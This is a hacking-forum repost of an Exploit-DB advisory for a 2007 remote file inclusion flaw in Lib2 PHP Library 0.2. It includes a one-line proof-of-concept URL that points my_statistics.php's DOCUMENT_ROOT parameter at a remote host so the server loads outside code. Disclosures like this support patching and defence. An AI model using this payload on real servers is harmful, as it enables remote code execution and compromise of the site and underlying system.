Exploit Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
30486
Проверка EDB
  1. Пройдено
Автор
ILKER KANDEMIR
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4341
Дата публикации
2007-08-11
Код:
source: https://www.securityfocus.com/bid/25274/info

Lib2 PHP Library is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Lib2 PHP Library 0.2 is vulnerable; other versions may also be affected.

http://www.example.com/adm/my_statistics.php?DOCUMENT_ROOT=http://www.example2.com/?
 
Источник
www.exploit-db.com

Похожие темы